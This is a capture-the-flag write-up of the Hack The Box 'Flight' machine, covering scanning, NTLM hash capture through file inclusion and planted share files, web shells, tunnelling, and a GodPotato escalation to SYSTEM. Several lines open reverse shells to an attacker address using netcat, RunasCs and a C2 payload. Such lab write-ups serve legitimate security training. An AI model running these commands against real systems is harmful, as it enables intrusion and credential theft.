HackTheBox

Writeups for the Hack The Box machines

View on GitHub

image

Enumeration:

I started the enumeration by running a quick RustScan and identified multiple open ports on the target system:

rustscan -a 10.10.11.187 -- -A -T4 -vv -oN flight_nmap

image

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-title: g0 Aviation
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
| http-methods: 
|   Supported Methods: HEAD GET POST OPTIONS TRACE
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-09-04 12:46:18Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49673/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49694/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49719/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.94SVN%E=4%D=9/4%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=66D7F491%P=x86_64-pc-linux-gnu)
SEQ(SP=104%GCD=1%ISR=10D%TI=I%II=I%SS=S%TS=U)
SEQ(SP=FC%GCD=1%ISR=105%TI=I%II=I%SS=S%TS=U)
OPS(O1=M53CNW8NNS%O2=M53CNW8NNS%O3=M53CNW8%O4=M53CNW8NNS%O5=M53CNW8NNS%O6=M53CNNS)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M53CNW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)

Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=252 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 7h00m01s
| smb2-time: 
|   date: 2024-09-04T12:47:19
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 32072/tcp): CLEAN (Timeout)
|   Check 2 (port 46616/tcp): CLEAN (Timeout)
|   Check 3 (port 44855/udp): CLEAN (Timeout)
|   Check 4 (port 27585/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   221.03 ms 10.10.14.1
2   221.13 ms 10.10.11.187

From the port scan results, I identified the domain flight.htb, which I then added to my host configuration file.

DNS enumeration:

Since port 53 was open, I proceeded to enumerate the DNS to check for any additional subdomains. The scan revealed two subdomains:

ffuf -H "Host: FUZZ.flight.htb" -u http://10.10.11.187/ -w /usr/share/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -fs 7069

image

I added both subdomains, school and deltek, to my host configuration file.

Web Enumeration:

Next, I proceeded with web enumeration since the HTTP server was running on port 80. Upon browsing flight.htb, I encountered a flight booking website:

image

I conducted a directory search on the website but didn’t find anything useful in the results:

image

After that, I navigated to school.flight.htb and found an aviation school website:

image

During the directory enumeration of the school website, I discovered a /cgi-bin/printenv.pl directory. Browsing through this directory revealed several internal details, including:

image

  - user: svc_apache
  - server: xampp
  - CGI version: 1.1

image

Lastly, I performed an enumeration on deltek.flight.htb and observed that it was identical to flight.htb. A directory search here yielded the same results.

Kerberos:

Next, I conducted enumeration on the Kerberos service to identify valid usernames. I used kerbrute for the enumeration, but the only result I found was the Administrator account:

kerbrute userenum --dc flight.htb -d flight.htb /usr/share/SecLists/Usernames/cirt-default-usernames.txt

image

RPC & LDAP:

Next, I attempted RPC and LDAP enumeration using null authentication. However, both attempts failed as authentication was required:

image

ldapsearch -x -H ldap://flight.htb -s base namingcontexts

image

SMB enumeration:

Next, I attempted SMB enumeration using NULL and Guest users, but neither attempt was successful.

image image

Initial Access:

Since I couldn’t find an initial access vector, I revisited school.flight.htb. While examining the website, I discovered a file inclusion vulnerability in the application that allowed me to read any file present in the current web directory.

image

By replacing about.html with C:/xampp/cgi-bin/printenv.pl, I was able to view the contents of the file:

image

I attempted to check the contents of other files, such as user.txt, but this did not work. However, when I tested index.php, which is in the same web root directory, I successfully accessed its content. The index.php file revealed that the application has filters in place to prevent file inclusion attempts:

image

Considering these filters, I tried forced authentication with my responder, but it was blocked:

image

Since the host is running Windows, which also accepts forward slashes, I attempted the same action using forward slashes. This time, it succeeded, and I received a response on my responder:

image

I then used this hash in Hashcat and, within moments, successfully cracked it to retrieve the plaintext password:

image

User enumeration:

With the password for the svc_apache user, I proceeded to enumerate the users and found 15 valid users on the target host:

nxc smb flight.htb -u svc_apache -p '*********' --users

image

SMB Shares:

Next, I examined the available shares with the current user and found multiple shares accessible for read-only access:

nxc smb flight.htb -u svc_apache -p '********' --shares

image

Using these credentials and smbclientng, I browsed through the SMB file shares and observed multiple files. However, I did not have write access to these shares.

smbclientng -u 'svc_apache' -p '**********' --target flight.htb

image

Despite having read permissions, I did not find any useful information in the shared folders:

image

Password spray:

Since the SMB share is open and I have write access to one of the folders, my remaining option was to drop a file with the responder address to capture the NTLM hash. I initially attempted to use a .lnk file with the slinky module from netexec:

image

However, this method did not work due to restrictions on file write extensions:

image

AS-REP Roast & Kerberoast:

Before exploring the file shares, I attempted AS-REP roasting and Kerberoasting to obtain Kerberos hashes for any users. Unfortunately, neither attack was successful:

impacket-GetNPUsers flight.htb/s.moon@10.10.11.187 -usersfile users.txt

image

nxc ldap flight.htb -u s.moon -p '********' --kerberoasting kerb.out

image

Forced Authentication Using Shortcut Files

Since, the SMB share is open & I have write access on one of the folder, the only option left here for me is to drop a file with the respoder address to steal the NTLM hash. In order to achieve this I started with the .lnk file for which I used slinky module available in netexec:

nxc smb flight.htb -u s.moon -p '********' -M slinky -o Name=TestFiler server=10.10.14.5

However, this method did not work due to restrictions on file write extensions:

image

After researching alternative methods, I found a tool called ntlm_theft from an ippsec video. This tool generates 21 different types of files to capture NTLM hashes.

Using ntlm_theft, I generated all the file types:

python3 ntlm_theft.py -g all -s 10.10.14.5 -f TestingTest

image

After generating the files, I began uploading them one by one. I started my responder and uploaded desktop.ini:

sudo responsder -I tun0

Shortly after, the user C.bum accessed the Shared folder, resulting in a hit on my responder with their NTLMv2 hash:

image

I then cracked the hash using John the Ripper and retrieved the plaintext password:

image

Uploading Web Shell:

With access to the c.bum account, I revisited the shares and discovered that I had write access to the Web directory:

image

I authenticated to this file share using smbclient-ng and uploaded a PHP-based web shell:

image

After uploading, I navigated to the directory and confirmed that the web shell was accessible. Running the whoami command revealed that the shell was operating under the svc_apache user:

image

I then initiated Villian-C2, generated a payload for a callback, and executed it on the target. This resulted in a session connecting back to my Kali host:🙂

generate payload=windows/hoaxshell/powershell_iex lhost=tun0 encode    #from villian c2

image

I used Villian-C2 for two main reasons:

Lateral Movement:

After gaining shell access, I began exploring options for lateral movement. I first checked the privileges of the current user but did not find any special privileges or associations with privileged groups:

net user svc_apache

whoami /all

image

image

I then searched for directories to see if there were any stored passwords or hardcoded credentials in scripts. However, I did not find anything useful, and in some directories, I lacked the necessary permissions.

svc_apache -> c.bum

Next, I examined the open TCP ports on the machine and found that ports 5985 and 8000 were open. These ports did not appear in the initial port scan, likely due to firewall restrictions:

netstat -ant | select-string "tcp"

image

Port Forwarding:

To access the open ports from my Kali host, I used ligolo-ng for port forwarding. I deployed the Ligolo agent on the Windows host and followed these steps to set up tunneling:

sudo ip tuntap add user kali mode tun ligolo #to add ligolo interface

sudo ip link set ligolo up #to start ligolo interface

./proxy -selfcert #to start ligolo proxy with self certificate

.\agent.exe -connect kali_ip:11601 -ignore-cert #to connect back to our proxy from target host

session > start

sudo ip route add 240.0.0.1/32 dev ligolo #to add new route of target host

image

After setting up the route, I accessed the web service on port 8000. I discovered it was a flight booking application:

image

Next, I attempted to authenticate with c.bum using the WinRM protocol, as I had valid credentials for this user. However, I was unable to log in due to insufficient rights:

evil-winrm -i 240.0.0.1 -u 'c.bum' -p '**********'

image

Shell as c.bum:

Upon checking the group memberships, I found that the c.bum user is part of the WebDevs group, which likely grants permissions to the web directory:

image

net user c.bum

image

To access the web root folder, I needed shell access as c.bum, which I did not currently possess. Despite having the valid password, I explored various methods to obtain a shell. After some research and references, I discovered the tool RunasCs, which can be used in the current shell without spawning a new shell like the traditional runas command.

I downloaded and transferred the RunasCs binary to the target host and executed it with c.bum credentials, using the -r option to obtain a reverse shell on my netcat listener:

.\RunasCs.exe c.bum ******* powershell.exe -r 10.10.14.5:4443

Immediately after executing the command, I received a session in my Villian-C2:

image

Shell as iis apppool\defaultapppool:

After gaining shell access as c.bum, I navigated to the web development folder located at C:\inetpub\development and attempted to upload a PHP webshell:

image

Unfortunately, the PHP webshell did not work as expected:

image

I then switched to an ASPX-based webshell and uploaded it to the development directory. This time, I was able to successfully access the webshell:

image

I executed a Villian-C2 payload and received a reverse session:

image

However, this shell proved unstable. To remedy this, I uploaded the netcat binary to the target host and executed it through the ASPX shell:

C:\temp\nc64.exe -e cmd.exe 10.10.14.5 4444

This provided me with an interactive shell:

image

Shell as SYSTEM:

With a stable shell in place, I checked the privileges of the current user and discovered that it had the SeImpersonatePrivilege. This indicated that I could use the Potato exploit to escalate to SYSTEM privileges:

image

I utilized the GodPotato exploit to exploit this vulnerability. After uploading the exploit to the target host, I executed GodPotato-NET4.exe with the netcat binary to obtain a reverse shell:

.\GodPotato-NET4.exe -cmd "nc64.exe 10.10.14.5 4433 -e cmd"

Immediately after execution, I received a connection back to my netcat listener with SYSTEM privileges: (pwn3d!🎉)

image

With SYSTEM access, I retrieved both the user and root flags from the host.